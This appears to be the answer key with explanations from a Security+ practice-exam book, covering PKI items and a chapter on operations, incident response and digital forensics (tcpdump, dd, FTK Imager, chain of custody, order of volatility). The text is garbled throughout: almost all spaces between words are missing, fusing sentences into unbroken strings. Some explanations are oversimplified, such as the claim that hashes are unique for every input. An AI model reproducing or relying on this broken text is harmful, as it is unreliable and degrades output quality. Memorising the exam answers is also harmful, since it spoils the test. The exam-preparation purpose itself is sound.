221. B. Certificatepinningassociatesaknowncertificatewithahostandthencomparesthatknowncertificatewiththecertificatethatispresented.Thiscanhelppreventman-in-the-middleattacksbutcanfailifthecertificateisupdatedandthepinnedcertificateisn’t.ACRL,orcertificaterevocationlist,wouldshowwhetherthecertificatehasbeenrevoked,butitwouldnotshowifitwaschanged.Patrickwillnothaveaccesstotheremoteserver’sprivatekeyunlesshehappenstobetheadministrator.
222. C. PrivacyEnhancedMail(PEM)isthemostcommonformatissuedbycertificateauthorities.DistinguishedEncodingRules(DER)formatisabinaryformoftheASCIItextPEMformat.PKCS#7orP7BformatisBase64ASCII,andPKCS#12,orPFX,formatisbinaryformatusedtostoreservercertificates,intermediatecertificates,andprivatekeysinasinglefile.
223. C. Michelle’sonlyoptionistoremovethecertificatefromthelistoftrustedcertificatesoneverymachinethattrustedit.Thiscanbetime-consuminganderrorprone,andit’sonereasonself-signedcertificatesareavoidedinproductionatmanyorganizations.
224. D. ChangingtheIPaddressesassociatedwithadomaintoanarbitraryvaluecouldcauseroutingorotherproblems.ThatmeansthatchangingtheIPaddresswouldnotbeachosenmethodofvalidatingadomain.Theremainingoptionsarelegitimateandnormalmeansofvalidationforcertificates.
225. A. SNMPv3addstheabilitytoauthenticateusersandgroupsandthenencryptmessages,providingmessageintegrityandconfidentiality.ItdoesnothaveSQLinjectionpreventionbuiltin,butitalsoisn’taprotocolwhereSQLinjectionwilltypicallybeaconcern.
226. A. Thisdiagramshowsareverseproxy.Areverseproxytakesconnectionsfromtheoutsideworldandsendsthemtoaninternalserver.Aforwardproxytakesinternalconnectionsandsendsthemtoexternalservers.Round-robinandnext-generationproxiesarenottypesofproxies,althoughround-robinisaformofloadbalancing.
Telegram Channel @nettrain
Chapter4:OperationsandIncidentResponse1. A. Milashouldselectahashbecauseahashisdesignedtobeuniqueto
eachpossibleinput.Thatmeansthatmultiplefilescouldhavethesamechecksumvalue,whereasahashingalgorithmwillbeuniqueforeachfilethatitisrunagainst.
2. A. Allowlistsarelistsofapprovedsoftware.Softwarecanonlybeinstalledifitisonanallowlist.Denylistsblockspecificapplications,buttheycannotaccountforeverypossiblemaliciousapplication.Accesscontrollists(ACLs)determinewhocanaccessaresource.Ahostintrusiondetectionsystem(HIDS)doesnotpreventsoftwarefrombeinginstalled.
3. C. Correlationdashboardsareusedtoaggregateeventsandtoseekoutconnections.Insomecases,thisisdonewithadvancedanalyticalgorithms,includingartificialintelligence(AI)andmachinelearning(ML).Anetworkintrusiondetectionsystem(NIDS)wouldbehelpfulbutwillnot(byitself)necessarilycorrelateevents.Apublickeyinfrastructure(PKI)handlescertificates,notcorrelationandvisibilityofsecurityevents.Trenddashboardswouldshowhowthingsaregoingandwhichwaystatisticsandinformationaremoving.
4. D. Usingtcpdumpwithflagslike-itosettheinterface,tcptosettheprotocol,andporttosettheportwillcaptureexactlythetrafficEmilyneedstocapture.Port443isthedefaultHTTPSport.Thereisno-protoflagfortcpdump.
5. A. Tabletopexercisesareusedtotalkthroughaprocess.Unlikewalk-throughs,whichfocusonstep-by-stepreviewofanincident,Milawillfocusmoreonhowherteamrespondsandonlearningfromthoseanswers.Atabletopexercisecaninvolvegamingoutasituation.Asimulationactuallyemulatesaneventorincident,eitheronasmalloralargescale.DrillsarenotdefinedaspartoftheSecurity+examoutline.
6. A. Backupsareconsideredtobetheleastvolatiletypeofstoragesincetheychangeatamuchslowerpaceand,infact,maybeintentionallyretainedforlongperiodsoftimewithoutchanging.Inthislist,CPUcachewillchangethemostfrequently,thenRAM,thenlocaldiskcontents.
7. C. Incidentrespondersknowthatscanresultscanshowvulnerablesystemsandservices,providingcluesabouthowattackersmayhave
Telegram Channel @nettrain
obtainedaccesstosystems.Thescanswillnotshowtheprogramstheattackersusedbutmayshowservicesthattheyhaveenabledorchanged.Thescanswillshowtheversionsofsoftwareinstalledbeforetheattack,butthatinformationisonlyusefuliftheattackerseitherupgradedorchangedthesoftwareorthesoftwarewasvulnerable,makingthisalessaccurateandusefulanswer.Finally,thescansmayshowwherenetworksecuritydevicesare,butthatinformationshouldbeavailabletotheincidentresponseteamwithouttryingtofigureitoutfromscans.
8. C. Aftereradicationoftheissuehasbeencompleted,recoverycanbegin.Recoverycanincluderestorationofservicesandareturntonormaloperations.
9. C. The-pflagaddsapersistentroutewhencombinedwiththeADDcommand.Persistentrouteswillremainintheroutingtablebetweenboots.Bydefault,theyareclearedateachboot.Anattackermaychoosetousethistohelpwithanon-path(man-in-the-middle)attack.
10. D. Oftheoptionsprovided,onlytheHarvesterisanopensourceintelligencetool.Curlisatoolusedtotransferdata,hpingisatoolthatisfrequentlyusedtobuildcustompacketsandtoperformpacketanalyzerfunctions,andnetcatisautilitythatallowsyoutoreadandwritetonetworkconnections,makingitabroadlyusedtoolforpentestersandattackerswhoneedtotransferdatausingasmall,capableutility.
11. C. TheMITREATT&CKframeworkfocusesontechniquesandtacticsanddoesnotfocusonaspecificorderofoperationsliketheCyberKillChaindoes.ItalsocoversabroaderrangeoftechniquesandadversariesthantheDiamondModeldoesandisbroadlyimplementedinmanyexistingtools.TheCVSSstandardisavulnerabilityscoringsystemandisnotausefulframeworkforanalyzingmalwareandattacks.
12. D. Toproperlypreservethesystem,Tedneedstoensurethatitdoesnotchange.Turningthesystemoffwillcauseanythinginmemorytobelost,whichmaybeneededfortheinvestigation.Removingthedrivewhileasystemisrunningcancausedatatobelost.Instead,liveimagingthemachineanditsmemorymayberequired.Allowinguserstocontinuetouseamachinewillresultinchanges,whichcanalsodamageTed’sabilitytoperformaforensicinvestigation.
13. D. Containmenteffortsareusedtolimitthespreadorimpactofanincident.Containmentmayfocusonkeepingsystemsorservicesonlineto
Telegram Channel @nettrain
ensurethatorganizationscancontinuetofunctionuntilotheroptionsforbusinesscontinuitycanbeimplemented.Segmentationmovessystemsorservicesintodifferentsecurityzones,andisolationremovesthemfromallcontactorputstheminsmallgroupsthatareremovedfromtherestoftheorganizationandsystemsthatarenotimpacted.
14. D. Windowsdoesnotlognetworktrafficatalevelofgranularitythatwillshowifafilehasbeenuploaded.Basictrafficstatisticscanbecaptured,butwithoutadditionalsensorsandinformationgatheringcapabilities,JessicawillnotbeabletodetermineiffilesaresentfromaWindowssystem.
15. C. Thechainofcustodyinforensicactivitiestrackswhohasadevice,data,orotherforensicartifactatanytime,whentransfersoccur,whoperformedanalysis,andwheretheitem,system,ordevicegoeswhentheforensicprocessisdone.Evidencelogsmaybemaintainedbylawenforcementtotrackevidencethatisgathered.Papertrailanddigitalfootprintarenottechnicaltermsusedfordigitalforensics.
16. A. Ofthelistedtools,onlynmapisaportscanner,andthusitisthetoolthatwillprovidetherequiredinformation.routeisacommand-linetooltoviewandaddnetworktrafficroutes.hpingisapacketgeneratorandanalyzer,andnetstatisacommand-linetoolthatshowsnetworkconnections,interfacestatistics,andotherusefulinformationaboutasystem’snetworkusage.
17. B. The-cflagforgrepcountsthenumberofoccurrencesforagivenstringinafile.The-nflagshowsthematchedlinesandlinenumbers.Evenifyou’renotsureaboutwhichflagiswhich,thesyntaxshouldhelponaquestionlikethis.Whenusinggrep,thepatterncomesbeforethefilename,allowingyoutoruleouttwooftheoptionsrightaway.
18. B. Stakeholdermanagementinvolvesworkingwithstakeholders,orthosewhohaveaninterestintheeventorimpactedsystemsorservices.COOP,orContinuityofOperationsPlanning,isaU.S.federalgovernmentefforttoensurethatfederalagencieshavecontinuityplans.PAMisprivilegedaccountmanagement.Stakeholdermanagementinvolvesmorethanjustcommunications,althoughcommunicationsisanimportantpartofit.
19. D. Themostcommonreasonforaone-hourtimeoffsetbetweentwosystemsinthesamelocationisafaultytimezonesettingcreatingatimeoffsetbetweenthesystems.
20. C. DNSdataisfrequentlyloggedtohelpidentifycompromisedsystemsor
Telegram Channel @nettrain
systemsthathavevisitedknownphishingsites.DNSlogscanbeusedalongwithIPreputationandknownbadhostnameliststoidentifyissueslikethese.DNSdataisnotcommonlyusedtoidentifynetworkscansandcannotcapturethem.Domaintransfersarenotattacks,althoughtheyareinformationgatheringandwillshowinthelogs.DNSdoesnotcaptureinformationaboutlogins.
21. D. Evenifyou’renotdeeplyfamiliarwiththeopensslcommand-lineutility,youshouldknowthatcertificatesuseciphersthatacceptabitlengthasaflagandthatbitlengthslike1024,2048,and4096arecommon.Thesekeylengthsarenotcommonlycommunicatedinbytes,andcertificatesareunlikelytolastformultipledecades,althoughacertificateauthority(CA)rootcertificatecanlastforalongtime.
22. B. Bydefault,thetailcommandshowsthelast10linesofafile,andusingthe-fflagfollowschangesinthefile.headshowsthetopofafile,andfootandfollowweremadeupforthisquestion.
23. B. Althoughfirmwareacquisitionisalesscommonlyusedtechnique,firmwareistypicallystoredinachiponasystemboardratherthanondisk.Henryismostlikelytosucceedifheretrievestherunningfirmwarefrommemory.Aserialconnectionmayworkbutwouldtypicallyrequirerebootingthesystem.
24. B. NetworkflowsusingNetFloworsFlowwouldprovidetheinformationthatEricwants,withdetailsofhowmuchtrafficwasused,when,andwheretrafficwasdirected.Afirewallordatalossprevention(DLP)wouldnotshowthebandwidthdetail,althoughafirewallmayshowtheconnectioninformationforevents.Packetflowwasmadeupforthisquestionandisnotatechnologyusedforthispurpose.
25. D. HashingusingMD5orSHA1iscommonlyusedtovalidatethataforensicimagematchestheoriginaldrive.Manyforensicduplicatorsautomaticallygenerateahashofbothdriveswhentheycompletetheimagingprocesstoensurethatthereisadocumentationchainfortheforensicartifacts.Athirdimagemaybeusefulbutdoesnotvalidatethis.Directorylistingsdonotprovethatdrivesmatch,andphotos,thoughusefultodocumentthedrivesandserialnumbers,donotvalidatethecontentsofthedrives.
26. B. Nessusisapopularvulnerabilityscanningtool.Itisnotafuzzer,webapplicationfirewall(WAF),orprotocolanalyzer.
Telegram Channel @nettrain
27. A. Oftheoptionslisted,theonlyrequirementforadmissibilityisthattheevidencemustberelevant.Evidencemustalsobeauthenticated,meaningthatitneedstobegenuine.
28. D. Thecosttotheorganizationisnottypicallyapartofcommunicationsplanning.Sinceincidentscanhaveabroadrangeofcosts,andsinceexposingthosecostscancauseworryoralossofcustomerconfidenceintheworstcase,thecostsoftheincidentarerelativelyrarelyexposedaspartoftheincidentresponseprocess.Communicationswithcustomersandemployeesiscritical,andhavingdifferentcommunicationplansfordifferenteventseveritieshelpsensurethatappropriatecommunicationsoccur.
29. B. Thecatcommandwithoutananglebrackettoredirectitwillsimplydisplaythecontentsofthefileslisted.Thus,thiscommandwilldisplayfile1.txt,andthenfile2.txt.IfRickhadinserted>betweenthetwofiles,itwouldhaveappendedfile1.txttofile2.txt.
30. D. CentOSandRedHatbothstoreauthenticationloginformationin/var/log/secureinsteadof/var/log/auth.logusedbyDebianandUbuntusystems.Knowingthedifferencesbetweenthemajordistributionscanhelpspeedupyourforensicandincidentinvestigations,andconsistencyisoneofthereasonsthatorganizationsoftenselectasingleLinuxdistributionfortheirinfrastructurewheneveritispossibletodoso.
31. B. Webpagetitles,aswellasheaderslikemetatags,areexamplesofmetadataaboutapageandarefrequentlyusedtogatherinformationaboutwebpagesandwebsites.Headersareusedaspartofapage’sdesignandtypicallydescribethebaratthetopofthepageusedforsitenavigation.Summaryandhiddendataarenottechnicaltermsusedtodescribewebpagecomponents.
32. C. Cuckoo,orCuckooSandbox,isamalwareanalysissandboxthatwillsafelyrunmalwareandthenanalyzeandreportonitsbehavior.stringsisacommand-linetoolthatretrievesstringsfrombinarydata.scanlessisatooldescribedasaportscraper,whichretrievesportinformationwithoutrunningaportscanbyusingwebsitesandservicestorunthescanforyou.Sn1perisapentestframework.
33. C. AlthoughAutopsy,strings,andgrepcanallbeusedtoretrieveinformationfromfiles,exiftoolistheonlypurpose-builtfilemetadataretrievaltoollisted.
Telegram Channel @nettrain
34. B. FTKImagerisafreetoolthatcanimagebothsystemsandmemory,allowingIsaactocapturetheinformationhewants.Althoughddisusefulforcapturingdisks,othertoolsaretypicallyusedformemorydumps,andthoughddcanbeusedonaWindowssystem,FTKImagerisamorelikelychoice.Autopsyisaforensicanalysistoolanddoesnotprovideitsownimagingtools.WinDumpisaWindowsversionoftcpdump,aprotocolanalyzer.
35. B. Whenartifactsareacquiredaspartofaninvestigation,theyshouldbeloggedanddocumentedaspartoftheevidencerelatedtotheinvestigation.Artifactscouldincludeapieceofpaperwithpasswordsonit,toolsortechnologyrelatedtoanexploitorattack,smartcards,oranyotherelementofaninvestigation.
36. A. TheMXrecordsforadomainlistitsemailservers.GarycanusenslookuptoqueryDomainNameSystem(DNS)fortheMXserversusingthecommandnslookup-query=mxexample.comtolookupexample.com’semailserver.pingdoesnotsupportMXserverlookups,andbothsmtpandemailarenotcommand-linetools.
37. B. WiresharkcanbeusedtocaptureandanalyzeliveSessionInitiationProtocol(SIP)trafficonanetwork.AnalystsshouldkeepthefactthatSIPtrafficmaybeencryptedontheirnetworkandthattheymayneedtotakeadditionalstepstofullyviewthecontentofSIPpackets.LogfilescanprovideinformationaboutSIPsessionsandeventsandareusefulforanalysisafterthefact,buttheywon’tprovidethesamedetailaboutliveSIPtraffic.Nessusisavulnerabilityscanner,andSIPperwasmadeupforthisquestion.
38. A. Althoughallofthetoolslistedcanperformaportscanandidentifyopenports,netcatistheonlyonethatdoesnotalsointegrateautomatedserviceidentification.
39. D. Forensicreportsshouldincludeappropriatetechnicaldetail.Analysisofasystemdoesnotincludeapictureofthepersonfromwhomthesystemwasacquired.
40. A. ThisquestiontestsyourknowledgeofboththecommonLinuxlogsandbasicformatinformationfortheauth.logfile.Gregcouldusegreptosearchfor"Failedpassword"intheauth.logfilefoundin/var/logonmanyLinuxsystems.Thereisnotacommonlogfilenamedbruteforce.log;tailandheadarenotusefulforsearchingthroughthe
Telegram Channel @nettrain
file,onlyforshowingasetnumberoflines;and/etc/isnotthenormallocationfortheauth.logfile.
41. C. Thebrowsercache,history,andsessioninformationwillallcontaininformationfromrecentlyvisitedsites.Bookmarksmayindicatesitesthatauserhasvisitedatsomepoint,butabookmarkcanbeaddedwithoutvisitingasiteatall.
42. C. Wiresharkisapacketanalyzerthatcanbeusedtocaptureandanalyzenetworktrafficforforensicpurposes.Unlikediskforensics,networkforensicsrequireforethoughtandintentionalcaptureofdatabeforeitisneededsincetrafficisephemeral.OrganizationsthatwanttohaveaviewofnetworktrafficwithoutcapturingalltrafficmightuseNetFloworsFlowtoprovidesomeinformationaboutnetworktrafficpatternsandusage.Nessusisavulnerabilityscanner,nmapisaportscanner,andSimpleNetworkManagementProtocol(SNMP)isaprotocolusedtotransferandgatherinformationaboutnetworkdevicesandstatus.
43. A. Mappingnetworksusingpingreliesonpingingeachhost,andthenusestime-to-live(TTL)informationtodeterminehowmanyhopsexistbetweenknownhostsanddevicesinsideanetwork.WhenTTLsdecrease,anotherrouterorswitchtypicallyexistsbetweenyouandthedevice.Packetssentandreceivedcanbeusedtodetermineifthereareissueswiththepathorlink,andtransittimecanprovideinformationaboutrelativenetworkdistanceorthepathused,buttracerouteprovidesfarmoreusefuldetailinthatcase.
44. C. Organizationsdefineretentionpoliciesfordifferentdatatypesandsystems.Manyorganizationsuse30-,45-,90-,180-,or365-dayretentionpolicies,withsomeinformationrequiredtobekeptlongerduetolaworcompliancereasons.Susan’sorganizationmaykeeplogsforaslittleas30daysdependingonstoragelimitationsandbusinessneeds.Dataclassificationpoliciestypicallyimpacthowdataissecuredandhandled.Backuppoliciesdeterminehowlongbackupsareretainedandrotatedandmayhaveanimpactondataifthelogsarebackedup,butbackinguplogsarealesscommonpracticeduetothespacetheytakeupversusthevalueofhavinglogsbackedup.Legalholdpracticesarecommon,butpoliciesarelesstypicallydefinedforlegalholdssincerequirementsaresetbylaw.
45. C. Zero-wipingadrivecanbeaccomplishedusingdd,andwhenthiscommandiscompletedSelahwillhavewrittenzeroestotheentiredrive
Telegram Channel @nettrain
/dev/sda.
46. C. Involvingimpactedareas,orthosethathavearoleintheprocess,ispartofstakeholdermanagementandensuresthatthosewhoneedtobeinvolvedorawareoftheincidentresponseprocessareengagedthroughouttheprocess.Lawsrarelyhavespecificrequirementsforinternalinvolvement,insteadfocusingoncustomersorthosewhosedataisinvolvedinanincident.Retentionpoliciesdeterminewhatdataiskeptandforhowlong.COOPisContinuityofOperationsPlanning,afederalefforttoensuredisasterrecoveryandbusinesscontinuityplansareinplaceforfederalagencies.
47. A. Asimulationistheclosestyoucangettoareal-worldeventwithouthavingone.Atabletopexercisehaspersonneldiscussingscenarios,whereasawalk-throughgoesthroughchecklistsandprocedures.Awargameisnotacommonexercisetype.
48. C. TheContent-AddressableMemory(CAM)tablesonswitchescontainalistofallthedevicestheyhavetalkedtoandwillgiveErinthebestchanceofidentifyingthedevicesonthenetwork.Wiresharkandnetstatwillonlyhaveaviewofthedevicesthatthesystemsheisworkingfromcommunicatewithorthatbroadcastonthenetworksegmentsheison.DomainNameSystem(DNS)willlistonlysystemsthathaveaDNSentry.Inmostorganizations,relativelyfewsystemswillhaveentriesinDNS.
49. C. Sensorsaredeployed,eitherasagents,hardware,orvirtualmachinestogatherinformationtorelayitbacktoasecurityinformationandeventmanagement(SIEM)device.Alertlevels,trendanalysisfeatures,andsensitivitythresholdsareallusedtoanalyzeandreportondata,nottogatherdata.
50. C. Aquarantineprocessorsettingwillpreservemaliciousordangerousfilesandprogramswithoutallowingthemtorun.Thisallowsdefenderstoretrievethemforfurtheranalysisaswellastoreturnthemtouseiftheyaredeterminednottobemalicious,orifthemaliciouscomponentscanberemovedfromneededfiles.Purging,deep-freezing,andretentionarenottermsusedtodescribethisbehaviororsetting.
51. C. Chuckshouldrecommendamobiledevicemanagement(MDM)systemtoensurethatorganizationaldevicescanbemanagedandprotectedinthefuture.Datalossprevention(DLP)willnotstopalostphonefrombeingapotentialleakofdata,isolatingthephonesisnotarealisticscenario
Telegram Channel @nettrain
fordevicesthatwillactuallybeused,noriscontainmentbecausethephoneisoutoftheorganization’scontroloncelost.
52. A. Acontentfilterisspecificallydesignedtoalloworganizationstoselectbothspecificsitesandcategoriesofcontentthatshouldbeblocked.Gabbycouldreviewcontentcategoriesandconfigurethefiltertopreventstudentsfrombrowsingtotheunwantedsites.Adatalossprevention(DLP)solutionisdesignedtopreventdataloss,afirewallcanblockIPaddressesorhostnamesbutwouldrequireadditionalfunctionalitytofiltercontent,andanintrusiondetectionsystem(IDS)candetectunwantedtrafficbutcannotstopit.
53. B. Informationstoredonadiskdriveisoneoftheleastvolatileitemsintheorderofvolatility,butbackupsareevenlessvolatile.ThatmeansFrankshouldcapturebackupsafterheimagesthediskdriveandthatheshouldcaptureCPUcacheandregistersaswellassystemRAMfirstifheneedsthem.
54. C. The-Rflagappliesthepermissionrecursivelytoallfilesinthenameddirectory.Here,thepermissionsare7,whichsetstheownertoread,write,andexecute,and55,whichsetsgroupandthenworldpermissionstoreadonly.755isaverycommonlyusedpermissiononLinuxsystems.
55. B. ThemostimportantactionCharlescantakewhileworkingwithhisforensicartifactstoprovidenonrepudiationistodigitallysigntheartifactsandinformationthatheiscreatinginhisevidencerecords.Encryptingtheoutputwillensureitsconfidentialitybutwillnotprovidenonrepudiationbyitself.MD5checksumsforimagesarecommonlygatheredbutmustthenbesignedsothattheycanbevalidatedtoensuretheyhavenotbeenmodified.
56. D. Thememdumptoolisacommand-linememorydumputilitythatcandumpphysicalmemory.Somewhatconfusingly,memdumpisalsoaflagintheveryusefulVolatilityframework,whereitcanbeusedtodumpmemoryaswell.TheremainingoptionsweremadeupandarenotLinuxtools,althoughyoucancreatearamdumponAndroiddevices.
57. B. TheWindowsswapfileispagefile.sysandissavedintherootoftheC:\drivebydefault.
58. A. Thebestwaytocaptureavirtualmachinefromarunninghypervisorisusuallytousethebuilt-intoolstoobtainasnapshotofthesystem.Imagingtoolsarenottypicallycapableofcapturingmachinestate,andddisnotdesignedtocaptureVMs.Removingaserver’sdrivescanbechallenging
Telegram Channel @nettrain
duetoRAIDandotherspecificserverconfigurationitems,anddoingsomightimpactallotherrunningVMsandservicesonthesystem.
59. C. Awell-documentedchainofcustodycanhelpestablishprovenancefordata,provingwhereitcamefrom,whohandledit,andhowitwasobtained.Righttoaudit,timelines,andpreservationofimagesdonotestablishprovenance,althoughpreservationispartofthechainofcustodyprocess.
60. B. Digitalforensicstechniquesarecommonlyusedtoanalyzeattackpatterns,tools,andtechniquesusedbyadvancedpersistentthreat(APT)actorsforcounterintelligencepurposes.Theymaysometimesbeusedtodeterminewhatinformationwasstolen,butthisisnotthemostcommonusefordigitalforensictechniques,noristheiruseasatrainingmechanism.
61. A. Lawenforcementisnottypicallypartoforganizationalincidentresponseteams,butincidentresponseteamsoftenmaintainarelationshipwithlocallawenforcementofficers.Securityanalysts,management,andcommunicationstaffaswellastechnicalexpertsareallcommonlypartofacoreincidentresponseteam.
62. A. Evenifyou’renotfamiliarwithiptables,youcanreadthroughtheserulesandguesswhichruleincludestherightdetails.DROPmakessenseforablock,andyoushouldknowthatSSHwillbeaTCPserviceonport22.
63. C. loggerisaLinuxutilitythatwilladdinformationtotheLinuxsyslog.Itcanacceptfileinput,writetothesystemjournalentry,sendtoremotesyslogservers,andperformavarietyofotherfunctions.Theothercommandsdonotdirectlyinterfacewiththesystemlog.
64. A. Incidentresponseplansdon’tstopincidentsfromoccurring,buttheydohelprespondersreactappropriately,preparetheorganizationforincidents,andmayberequiredforlegalorcompliancereasons.
65. D. Degaussingadriveusesstrongmagneticfieldstowipeitandistheleastlikelytoresultinrecoverabledata.Deletedfilescanoftenberecoveredbecauseonlythefileindexinformationwillberemoveduntilthatspaceisneededandisoverwritten.Quickformatsworkinasimilarwayandwillleaveremnantdata,andfilesthatareoverwrittenbysmallerfileswillalsoleavefragmentsofdatathatcanberecoveredandanalyzed.
66. D. Henry’smostlikelyuseforthevideoistodocumenttheforensicprocess,partofthechainofcustodyandprovenanceoftheforensicdataheacquires.Theorderofvolatilityhelpsdeterminewhatdevicesordriveshe
Telegram Channel @nettrain
wouldimagefirst.Thereisnocrimebeingcommitted,soestablishingguiltisnotrelevanttothisscenario,andthevideowillnotensuredataispreservedonadriveduringaforensicprocess.
67. B. WinHexistheonlydiskeditorinthislist.Autopsyisaforensicanalysissuite;ddandFTKImagerarebothimagingtools.WinHexalsoprovidestheabilitytoreadRAIDanddynamicdisks,performdatarecovery,editphysicalmemory,clonedisks,wipefilesanddrives,andavarietyofotherfunctions.
68. B. Playbookslisttherequiredstepsthatareneededtoaddressanincident.Arunbookfocusesonthestepstoperformanactionorprocessaspartofanincidentresponseprocess.Thus,aplaybookmayreferencerunbooks.Businesscontinuity(BC)plansanddisasterrecovery(DR)plansarenotusedforincidentresponse,buttheyareusedtoensurethatabusinessstaysonlineorcanrecoverfromadisaster.
69. C. Passwordsaretypicallystoredusingahash,andbestpracticeswouldhavethemstoredusingapasswordsecurity–specifichash.Alainacanspeeduphereffortsifsheknowswhathashingalgorithmandoptionswereusedonthepasswords.Theageandlengthofthepasswordsarenotnecessary,andpasswordsshouldnotbestoredinencryptedform—butthequestionalsospecificallynotesthey’rehashedpasswords.
70. D. AnapplicationblocklistwouldfitVincent’sneedsthebestfromthelistprovided.Anapprovedlistwouldpreventothertoolsfrombeinginstalled,whichmayimpedefunctionalitywhilemakingthemaintenanceofthelistchallenging.Adatalossprevention(DLP)solutionattemptstopreventdatafrombeingsentorexposedbutdoesnotpreventinstallationsordownloadsofgames.Acontentfiltermighthelp,butworkaroundsareeasy,includingsendinggamesviaemailorviaathumbdrive.
71. B. IPSecisnotatoolusedtocapturenetworkflows.sFlow,NetFlow,andIPFIXareallusedtocapturenetworkflowinformation,whichwillprovidetheinformationCharleneneeds.
72. C. Asystemcrash,orsystemdump,filecontainsthecontentsofmemoryatthetimeofthecrash.TheinfamousWindowsbluescreenofdeathresultsinamemorydumptoafile,allowinganalysisofmemorycontents.Theswapfile(pagefile)isusedtostoreinformationthatwouldnotfitinmemorybutisunlikelytocontainacurrentlyrunningmalwarepackage,sincefilesareswappedoutwhentheyarenotinuse.TheWindowssecuritylogdoes
Telegram Channel @nettrain
notcontainthistypeofinformation,nordoesthesystemlog.
73. C. TheWindowstracertcommandwillshowtheroutetoaremotesystemaswellasdelaysalongtheroute.tracerouteistheequivalentcommandinLinux.ThearpcommandallowsyoutoviewandmodifytheAddressResolutionProtocol(ARP)cacheinWindows,andnetstathasvaryingfunctionsindifferentoperatingsystemsbutgenerallyshowsstatisticsandinformationaboutnetworkusageandstatus.
74. B. PRTGandCactiarebothnetworkmonitoringtoolsthatcanprovidebandwidthmonitoringinformation.Bandwidthmonitorscanhelpidentifyexfiltration,heavyandabnormalbandwidthusage,andotherinformationthatcanbehelpfulforbothincidentidentificationandincidentinvestigations.Ifyouencounteraquestionlikethisontheexam,evenifyou’renotfamiliarwitheithertool,youcanuseyourknowledgeofwhatSimpleNetworkManagementProtocol(SNMP)isusedfortoidentifywhichofthecategoriesismostlikelycorrect.
75. D. TheSecurity+examoutlinefocusesonrighttoauditclauses,regulatoryandjurisdictionalissues,anddatabreachnotificationlawsaskeyelementstoconsiderwhenplanningon-siteversuscloudforensicdifferences.Provenanceisimportantregardlessofwheretheforensicactivityoccurs.
76. A. Avarietyofconfigurationchangescouldbepushedtomobiledevicestohelp:settingpasscodes,enablingfull-diskencryption(FDE)onmobiledevicesviaorganizationallydeployedmobiledevicemanagement(MDM),orevenpreventingsomesensitivefilesfrombeingdownloadedorkeptonthosedevicescouldallhelp.Firewallrules,datalossprevention(DLP)rules,andURLfilterswillnotpreventastolendevicefrombeingaccessedandthedatabeingexposed.
77. B. The@commandfordigselectstheDomainNameSystem(DNS)serveritshouldquery.Inthiscase,itwillqueryoneofGoogle’sDNSserversat8.8.8.8fortheDNSinformationforexample.com.
78. C. Gregshouldusethebuilt-inhashingfunctionstocompareeitheranMD5orSHA-1hashofthesourcedrivetoahashusingthesamefunctionrunontheimage.Iftheymatch,hehasavalidandintactimage.Noneoftheotheranswerswillprovidevalidationthatthefulldrivewasproperlyimaged.
79. B. TheLinuxgrepcommandisasearchtoolthatAdamcanusetosearch
Telegram Channel @nettrain
throughfilesordirectoriestofindstrings.catisshortforconcatenate,andthecommandcanbeusedtocreatefiles,toviewtheircontents,ortocombinefiles.headandtailareusedtoviewthebeginningorendofafile,respectively.
80. C. Segmentationsplitsnetworksorsystemsintosmallerunitsthatalignwithspecificneeds.Segmentationcanbefunctional,securitybased,orforotherpurposes.Removingpotentiallyinfectedsystemswouldbeanexampleofisolation,usingfirewallsandothertoolstostopthespreadofaninfectioniscontainment,andaddingsecuritysystemstopreventdatalossisanexampleofimplementingasecuritytoolorfeature.
81. B. Unlikeadisasterrecoveryplanthatiswrittentohelpanorganizationrecoveryfromaperson-madeornaturaldisaster,abusinesscontinuityplanfocusesonhowtokeepthebusinessrunningwhenitisdisrupted.Thus,Charlene’sBCplanwoulddetailhowtokeeptheorganizationrunningwhenasystemoutageoccurs.
82. C. OpenSSLcanbeusedtogenerateacertificateusingacommandlikethis:
opensslreq-x509-sha256-nodes-days365-newkeyrsa:2048-
keyout
privateKey.key-outcertificate.crt.
Noneoftheothertoolslistedcanbeusedtogenerateacertificate.
83. A. TheonlypasswordcrackerlistedisJohntheRipper.Johnacceptscustomwordlists,meaningthatCameroncancreateandusehisownwordlist,asshowninoptionA.
84. A. Autopsydoesnothaveabuilt-incapabilitytocreatediskimages.Instead,itreliesonthird-partytoolsforacquisitionandthenimportsdiskimagesandothermedia.Autopsyhasbuilt-intimelinegeneration,imagefilteringandidentification,andcommunicationvisualization,amongmanyothercapabilities.
85. C. Manycloudserviceprovidersdonotallowcustomer-drivenaudits,eitherbythecustomerorathirdparty.Theyalsocommonlyprohibitvulnerabilityscansoftheirproductionenvironmenttoavoidserviceoutages.Instead,manyprovidethird-partyauditresultsintheformofaserviceorganizationcontrols(SOC)reportorsimilarauditartifact.
86. B. TheCyberKillChainmovestoprivilegeescalationafterexploitation.
Telegram Channel @nettrain
Theentirekillchainis:1)Reconnaissance,2)Intrusion,3)Exploitation,4)PrivilegeEscalation,5)LateralMovement,6)Obfuscation/Anti-forensics,7)DenialofService,and8)Exfiltration.
87. D. Ofthetoolsthatarelisted,onlyMetasploitisanexploitationframework.Cuckooisamalwaretestingsandbox,theHarvesterisanopensourceintelligencegatheringtool,andNessusisavulnerabilityscanner.ToolslikeMetasploit,BeEF,andPacuareallexamplesofexploitationframeworks.
88. A. Aplaybookforasecurityorchestration,automation,andresponse(SOAR)environmentisasetofrulesthatdeterminewhatactionswillbeperformedwhenaneventoccursthatisidentifiedbytheSOARusingdataitcollectsorreceives.
89. B. TheSecurity+examoutlineusesasix-stepprocessforincidentresponse:Preparation,Identification,Containment,Eradication,Recovery,andLessonsLearned.
90. D. Adisasterrecoveryplanaddresseswhattododuringaperson-madeornaturaldisaster.Afloodthatcompletelyfillsadatacenterwouldrequiresignificanteffortstorecoverfrom,andGurvinderwillneedasoliddisasterrecoveryplan—andperhapsanewdatacenterlocationassoonaspossible!ACOOP,orContinuityofOperationsPan,isneededforU.S.governmentagenciesbutisnotrequiredforbusinesses.Abusinesscontinuityplanwouldcoverhowtokeepbusinessrunning,butitdoesnotcoveralltherequirementsinanaturaldisasterofthisscale,andafloodinsuranceplanisnotatermusedintheSecurity+exam.
91. C. pathpingcombinesbothpingandtracert/traceroutestylefunctionalitytohelpidentifyboththepathusedandwherelatencyisanissue.ItisbuiltintoWindowsandcanbeusedforexactlythetroubleshootingthatFrankneedstoaccomplish.Hecouldusebothpingandtracert/traceroutetoperformthetask,buthewouldneedtospendmoretimeusingeachtoolinturntoidentifythesameinformationthatpathpingwillputintoasingleinterface.netcat,whileusefulformanytasks,isn’taswellsuitedtothisone.
